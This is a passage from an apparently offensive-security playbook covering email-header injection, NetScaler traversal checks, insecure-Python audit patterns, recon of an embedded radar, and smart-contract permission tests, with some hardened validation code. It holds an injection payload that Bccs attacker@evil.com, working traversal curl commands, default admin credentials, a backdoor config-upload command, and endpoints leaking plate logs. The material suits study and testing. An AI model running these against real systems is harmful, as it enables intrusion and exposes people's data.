&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-json" data-lang="json"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;// Add CC/BCC via newline injection in the &amp;#34;to&amp;#34; field:
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#e78284"&gt;POST&lt;/span&gt; &lt;span style="color:#e78284"&gt;/v&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;3&lt;/span&gt;&lt;span style="color:#e78284"&gt;/mail/send&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;{
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;&amp;#34;personalizations&amp;#34;&lt;/span&gt;: [{
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;&amp;#34;to&amp;#34;&lt;/span&gt;: [{&lt;span style="color:#ca9ee6"&gt;&amp;#34;email&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;victim@target.com%0ACc:attacker@evil.com%0ABcc:attacker2@evil.com&amp;#34;&lt;/span&gt;}]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;&amp;#34;from&amp;#34;&lt;/span&gt;: {&lt;span style="color:#ca9ee6"&gt;&amp;#34;email&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;noreply@target.com&amp;#34;&lt;/span&gt;},
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;&amp;#34;subject&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;test&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;&amp;#34;content&amp;#34;&lt;/span&gt;: [{&lt;span style="color:#ca9ee6"&gt;&amp;#34;type&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;text/plain&amp;#34;&lt;/span&gt;, &lt;span style="color:#ca9ee6"&gt;&amp;#34;value&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;test&amp;#34;&lt;/span&gt;}]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;// → Email sent to the victim + CC + BCC to the attacker
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;// Also test in fields: subject, from_name, reply_to, custom_args
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Detection&lt;/strong&gt;: Send &lt;code&gt;\r\n&lt;/code&gt; and &lt;code&gt;\n&lt;/code&gt; (as real control characters, or JSON-escaped) plus &lt;code&gt;%0D%0A&lt;/code&gt; and &lt;code&gt;%0A&lt;/code&gt; in every input field of the email API, each followed by a &lt;code&gt;Bcc:&lt;/code&gt; pointing at a mailbox you control. A copy arriving there is the proof; a 400 that names the field shows where validation already exists.&lt;/p&gt;
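&lt;p&gt;The probes from 26.22 and 26.23 together with the server-side check that closes 26.23, as an added example (not the playbook&amp;rsquo;s code and not SendGrid&amp;rsquo;s). It assumes an application that builds or forwards email fields from user input; the canary strings, the naive header builder and the sample values are constructed. The Handlebars canary renders as the bare marker only if the input was compiled as a template; the CRLF list carries both raw newlines (what a JSON body needs) and percent-encoded ones (for fields that get URL-decoded). The hardened &lt;code&gt;safe_email&lt;/code&gt; rejects control characters first, because that is the actual injection vector, and only then checks that the value is a single plain address.&lt;/p&gt;

```python
"""Email-API injection probes and the hardened input check (added example; not the
playbook's or SendGrid's code). Assumes user input reaches email header fields; all
sample values below are constructed."""
import re
from email.utils import parseaddr

# Handlebars canary: executes to the bare marker only when compiled as a template.
HANDLEBARS_CANARY = "{{#if 1}}TPLCANARY{{/if}}"
# Line-break variants: raw ones for JSON bodies, encoded ones for URL-decoded fields.
CRLF_PROBES = ["\r\n", "\n", "%0D%0A", "%0A"]

CONTROL_CHARS = set(chr(code) for code in range(32)) | {chr(127)}
ADDR_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")


def template_injected(rendered):
    """True when the canary was executed: marker present, mustache braces gone."""
    return "TPLCANARY" in rendered and "{{" not in rendered


def header_injection_probes(field_value):
    """Mutations of one field value (e.g. the 'to' address) that add a Bcc you control."""
    return [f"{field_value}{sep}Bcc: canary@attacker.example" for sep in CRLF_PROBES]


def safe_email(value):
    """Hardened check for any address that ends up in an SMTP header.

    Rejects control characters (the real vector), percent-encoded line breaks (in case a
    downstream layer URL-decodes), and anything parseaddr would not hand back unchanged,
    which also blocks address lists. Returns the address or raises ValueError.
    """
    if any(ch in CONTROL_CHARS for ch in value):
        raise ValueError("control character in address")
    if re.search(r"%0[aAdD]", value):
        raise ValueError("encoded line break in address")
    _, addr = parseaddr(value)
    if addr != value.strip() or not ADDR_RE.match(addr):
        raise ValueError("not a single plain addr-spec")
    return addr


def build_headers_naive(to, subject):
    """The vulnerable pattern: user input concatenated straight into the header block."""
    return f"To: {to}\r\nSubject: {subject}\r\n"


def parse_header_block(raw):
    """What the MTA sees: one header per line, so one ra newline is enough to add Cc/Bcc."""
    headers = {}
    for line in raw.replace("\r\n", "\n").split("\n"):
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip()] = value.strip()
    return headers


if __name__ == "__main__":
    injected = "victim@target.com\nCc: attacker@evil.com\nBcc: attacker2@evil.com"
    print(parse_header_block(build_headers_naive(injected, "test")))
    for candidate in ["victim@target.com", injected, "victim@target.com%0ABcc:x@evil.com"]:
        try:
            print("accepted:", safe_email(candidate))
        except ValueError as err:
            print("rejected:", err)
```

&lt;p&gt;Python&amp;rsquo;s own &lt;code&gt;email.message.EmailMessage&lt;/code&gt; refuses header values containing a line feed; the naive string builder above is what you find in hand-rolled senders and thin API wrappers, and it is the thing to grep for.&lt;/p&gt;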
&lt;h3 id="2624-netscaler-citrix-adc--attack-surface" &gt;
&lt;div&gt;
&lt;a href="#2624-netscaler-citrix-adc--attack-surface"&gt;
##
&lt;/a&gt;
26.24 NetScaler (Citrix ADC) — Attack Surface
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 1. Identify NetScaler&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -skI &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/&amp;#34;&lt;/span&gt; | grep -i &lt;span style="color:#a6d189"&gt;&amp;#34;citrix\|netscaler&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Set-Cookie: NSC_*, Server: Citrix-ADC&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 2. CVE-2019-19781: directory traversal to RCE. The bare script paths should be blocked; the traversal is what proves it&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/vpns/portal/scripts/newbm.pl&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/vpns/portal/scripts/rmbm.pl&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk --path-as-is &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/vpn/../vpns/portal/scripts/newbm.pl&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk --path-as-is &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/vpn/../vpns/cfg/smb.conf&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# → smb.conf contents with a 200 = unpatched; 403 on the traversal = mitigated&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 3. NITRO REST API (admin): expect 401 without credentials; anything else is a finding&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/nitro/v1/config/vpnvserver&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/nitro/v1/config/systemuser&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/nitro/v1/config/sslcertkey&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# with credentials: add -H &amp;#34;X-NITRO-USER: nsroot&amp;#34; -H &amp;#34;X-NITRO-PASS: PASSWORD&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 4. Default credentials: nsroot/nsroot&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 5. SAML XXE (if SAML auth is configured)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Inject an XXE payload inside &amp;lt;samlp:AuthnRequest&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="2625-source-code-audit--insecure-python-patterns" &gt;
&lt;div&gt;
&lt;a href="#2625-source-code-audit--insecure-python-patterns"&gt;
##
&lt;/a&gt;
26.25 Source Code Audit — Insecure Python Patterns
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;The grep patterns below flag Python constructs that regularly turn into findings during a source code audit; the snippet after them shows the archive-extraction case.&lt;/p&gt;
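&lt;p&gt;For the archive-extraction pattern in the list that follows, here is what an application-side member check should look like. This is an added example, not the audited project&amp;rsquo;s &lt;code&gt;safe_extract()&lt;/code&gt; and not the stdlib&amp;rsquo;s data filter: it assumes the destination is a directory the application owns, it rejects link members outright (the simplest policy that also closes the create-symlink-then-write-through-it race), and the archives it builds are constructed in memory. Every member is validated before anything is written, so a bad archive extracts nothing rather than half of itself.&lt;/p&gt;

```python
"""Strict tar member filter for upload handlers (added example; not the audited project's
safe_extract() and not the stdlib's data filter).

Assumptions: dest_path is a directory the application owns; link members are rejected
outright; the archives built below are constructed in memory for the demonstration.
"""
import io
import os
import tarfile


def strict_filter(member, dest_path):
    """Same signature as a tarfile filter (3.12+): return the member or raise to reject it."""
    base = os.path.realpath(dest_path)
    target = os.path.realpath(os.path.join(base, member.name))
    if os.path.isabs(member.name) or os.path.commonpath([base, target]) != base:
        raise ValueError(f"path escapes destination: {member.name}")
    if member.issym() or member.islnk():
        raise ValueError(f"link member rejected: {member.name}")
    if not (member.isfile() or member.isdir()):
        raise ValueError(f"special file rejected: {member.name}")
    return member


def safe_members(tar, dest_path):
    """Validate every member before anything is written, so a bad archive extracts nothing."""
    return [strict_filter(member, dest_path) for member in tar.getmembers()]


def extract_safely(tar, dest_path):
    """Pre-validated member list, plus the stdlib data filter where the interpreter has it."""
    members = safe_members(tar, dest_path)
    extra = {"filter": "data"} if hasattr(tarfile, "data_filter") else {}
    tar.extractall(dest_path, members=members, **extra)


def build_archive(entries):
    """Constructed archives: (name, bytes) adds a file, (name, str) adds a symlink to str."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, payload in entries:
            info = tarfile.TarInfo(name)
            if isinstance(payload, bytes):
                info.size = len(payload)
                tar.addfile(info, io.BytesIO(payload))
            else:
                info.type = tarfile.SYMTYPE
                info.linkname = payload
                tar.addfile(info)
    return buf.getvalue()


def check_archive(data, dest_path="/srv/uploads"):
    """Dry run: the accepted member names, or the reason the archive would be rejected."""
    with tarfile.open(fileobj=io.BytesIO(data), mode="r") as tar:
        try:
            return [member.name for member in safe_members(tar, dest_path)]
        except ValueError as err:
            return str(err)


if __name__ == "__main__":
    evil = build_archive([("report.txt", b"ok"), ("../../etc/cron.d/evil", b"* * * * * root id\n")])
    print(check_archive(evil))
```

&lt;p&gt;When reviewing, compare this against what the codebase actually does: an extraction path that calls &lt;code&gt;extractall()&lt;/code&gt; with neither a member check nor &lt;code&gt;filter=&amp;#34;data&amp;#34;&lt;/code&gt; is the finding, and a second path in the same codebase that does have one is the inconsistency worth quoting in the report.&lt;/p&gt;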
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# TOCTOU via tempfile.mktemp() — predictable file names&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;grep -rP &lt;span style="color:#a6d189"&gt;&amp;#39;tempfile\.mktemp\b&amp;#39;&lt;/span&gt; .
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Zip Slip via zipfile.extractall() without path validation&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;grep -rP &lt;span style="color:#a6d189"&gt;&amp;#39;zipfile\.(extractall|extract)\b&amp;#39;&lt;/span&gt; .
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Check whether there is path-traversal sanitization on the file names&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# yaml.load() without SafeLoader — arbitrary deserialization&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;grep -rP &lt;span style="color:#a6d189"&gt;&amp;#39;(?&amp;lt;!\.SafeLoader\()yaml\.load\b&amp;#39;&lt;/span&gt; .
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# default yaml.load() uses FullLoader → RCE possible&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# eval() / exec() with user input&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;grep -rP &lt;span style="color:#a6d189"&gt;&amp;#39;(eval|exec)\s*\(&amp;#39;&lt;/span&gt; --include&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;*.py&amp;#34;&lt;/span&gt; .
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Hardcoded passwords&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;grep -rP &lt;span style="color:#a6d189"&gt;&amp;#34;(password|passwd|secret|token|api_key)\s*=\s*[&amp;#39;\&amp;#34;][^&amp;#39;\&amp;#34;]{8,}&amp;#34;&lt;/span&gt; --include&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;*.py&amp;#34;&lt;/span&gt; .
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# VULNERABLE CODE — Zip Slip:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;import&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;zipfile&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;z &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; zipfile&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;ZipFile(uploaded_file)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;z&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;extractall() &lt;span style="color:#737994;font-style:italic"&gt;# No path validation → files can escape the dir&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# SECURE CODE (in the same codebase — inconsistency!):&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;import&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;tarfile&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tar &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; tarfile&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;open(uploaded_file)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tar&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;extractall(members&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;safe_extract(tar)) &lt;span style="color:#737994;font-style:italic"&gt;# Has protection&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# → &amp;#34;Why doesn&amp;#39;t zipfile have safe_extract?&amp;#34; → report as an inconsistency&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="2626-embeddediot-device-recon" &gt;
&lt;div&gt;
&lt;a href="#2626-embeddediot-device-recon"&gt;
##
&lt;/a&gt;
26.26 Embedded/IoT Device Recon
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;Embedded devices (traffic radars, cameras, controllers) exposed to the internet often run a small Flask/Werkzeug app with no authentication at all. The endpoints below come from one such device, a speed-enforcement radar, and will differ on other products; the pattern (debugger leak, downloadable config, operational logs, an internal proxy) is what to look for:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 1. Werkzeug Debugger on embedded devices&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://IP:5000/&amp;#34;&lt;/span&gt; | grep -i &lt;span style="color:#a6d189"&gt;&amp;#34;werkzeug\|debug&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# The debugger page embeds its SECRET (seen in the field: 5BcAmPHc89fmWT3Tdflg) and the EVALEX / CONSOLE_MODE flags in inline JS&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# EVALEX=false → no interactive console, but full tracebacks with source lines still leak; EVALEX=true → PIN-gated Python console&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 2. Config files via download endpoints&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://IP:5000/config_ini&amp;#34;&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Lists configs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://IP:5000/download_config/camera.ini&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://IP:5000/download_config/httpsender.ini&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 3. Config upload (if it accepts new files)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -X POST &lt;span style="color:#a6d189"&gt;&amp;#34;http://IP:5000/upload_config/backdoor.ini&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -F &lt;span style="color:#a6d189"&gt;&amp;#34;file=@malicious.ini&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 4. Real-time operational logs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://IP:5000/ritux_logs&amp;#34;&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Available dates&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://IP:5000/ritux_log/2026-06-22&amp;#34;&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Logs for the day&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# → Vehicle plates, infractions, timestamps&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 5. Operational calendar&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://IP:5000/datas_afericao&amp;#34;&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Calibration dates&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://IP:5000/datas_teste_tarja&amp;#34;&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Test dates&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 6. Internal proxy via config&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;grep -r &lt;span style="color:#a6d189"&gt;&amp;#34;proxy.php&amp;#34;&lt;/span&gt; config_dump/
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# → /sistemas/afericao/oficial/imagens_afericoes/proxy.php?url=...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="2627-smart-contract-permission-testing-foundrycast" &gt;
&lt;div&gt;
&lt;a href="#2627-smart-contract-permission-testing-foundrycast"&gt;
##
&lt;/a&gt;
26.27 Smart Contract Permission Testing (Foundry/Cast)
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;For EVM smart contract auditing, the chain itself is the permission oracle: simulate the call from the attacker&amp;rsquo;s address and read back either a result or the revert reason, without broadcasting anything.&lt;/p&gt;
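&lt;p&gt;A small driver around the &lt;code&gt;cast&lt;/code&gt; procedure that follows, as an added example (not the playbook&amp;rsquo;s code and not part of Foundry). It simulates each admin function with &lt;code&gt;cast call --from&lt;/code&gt;, so nothing is broadcast or spent, and classifies the output. Assumptions: cast prints a value (or &lt;code&gt;0x&lt;/code&gt;) on success and an error mentioning &lt;code&gt;execution reverted&lt;/code&gt;, with the reason string when the contract supplies one, on failure; the exact wording varies between cast versions, so the parsing is deliberately loose. The function list, addresses and canned outputs are constructed. The proposal-state mapping is OpenZeppelin Governor&amp;rsquo;s &lt;code&gt;ProposalState&lt;/code&gt; enum, which is why 4 means Succeeded.&lt;/p&gt;

```python
"""Permission oracle for EVM admin functions via cast simulation (added example; not the
playbook's or Foundry's code). Assumes cast's output shape: a value on success, an
'execution reverted' error (with the reason when the contract gives one) on failure.
Function names, addresses and canned outputs are constructed."""
import subprocess

# OpenZeppelin Governor ProposalState enum: what state(uint256) returns.
PROPOSAL_STATES = ["Pending", "Active", "Canceled", "Defeated",
                   "Succeeded", "Queued", "Expired", "Executed"]

# Admin functions to try as the attacker (constructed; take the real list from the ABI).
ADMIN_CALLS = [
    ("addCouncilMember(address)", ["0x000000000000000000000000000000000000dEaD"]),
    ("setQuorumBps(uint256)", ["0"]),
    ("pause()", []),
]


def run_cast(args):
    """Real runner: execute cast, return stdout+stderr, never raise on a revert."""
    proc = subprocess.run(["cast", *args], capture_output=True, text=True)
    return proc.stdout + proc.stderr


def simulate(run, contract, sig, params, sender, rpc):
    """eth_call as `sender`: no transaction is broadcast, nothing is spent."""
    return run(["call", contract, sig, *params, "--from", sender, "--rpc-url", rpc])


def classify(output):
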